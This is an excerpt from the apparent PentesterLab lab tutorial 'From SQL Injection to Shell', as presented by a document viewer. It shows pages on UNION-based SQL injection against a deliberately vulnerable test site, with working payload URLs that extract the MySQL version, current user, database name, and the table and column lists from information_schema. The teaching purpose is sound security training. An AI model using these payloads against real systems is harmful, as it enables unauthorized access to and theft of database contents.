from_sqli_to_shell

Recommendations

Info

PentesterLab.com » From SQL Injection to Shell the database version: http://vulnerable/cat.php? id=1%20UNION%20SELECT%201,@@version,3,4 the current user: http://vulnerable/cat.php? id=1%20UNION%20SELECT%201,current_user(),3,4 the current database: http://vulnerable/cat.php? id=1%20UNION%20SELECT%201,database(),3,4 We are now able to retrieve information from the database and retrieve arbitrary content. In order to retrieve information related to the current application, we are going to need: the name of all tables in the current database the name of the column for the table we want to retrieve information from MySQL provides tables containing meta-information about the database, tables and columns available since the version 5 of MySQL. We are going to use these tables to retrieve the information we need to build the final request. These tables are stored in the database information_schema. The following queries can be used to retrieve: 28/41
PentesterLab.com » From SQL Injection to Shell the list of all tables: SELECT table_name FROM information_schema.tables the list of all columns: SELECT column_name FROM information_schema.columns By mixing these queries and the previous URL, you can guess what page to access to retrieve information: the list of tables: 1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables the list of columns: 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns The problem, is that these requests provide you a raw list of all tables and columns, but to query the database and retrieve interesting information, you will need to know what column belongs to what table. Hopefully, the table information_schema.columns stores table names: SELECT table_name,column_name FROM information_schema.columns To retrieve this information, we can either 29/41
Page 1 and 2: FROM SQL INJECTION TO SHELL By Loui
Page 3 and 4: PentesterLab.com » From SQL Inject
Page 7 and 8: The red boxes provide information o
Page 9 and 10: Fingerprinting Fingerprinting can b
Page 11 and 12: Where: $ openssl s_client -connect
Page 13 and 14: Detection and exploitation of SQL i
Page 15 and 16: The string1 value is delimited by a
Page 17 and 18: URL Article displayed /article.php?
Page 27: Even if this methodology provides t
Page 33 and 34: Access to the administration pages
Page 35 and 36: Unfortunately, the MD5 available is
Page 41: PentesterLab.com » From SQL Inject

from_sqli_to_shell

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?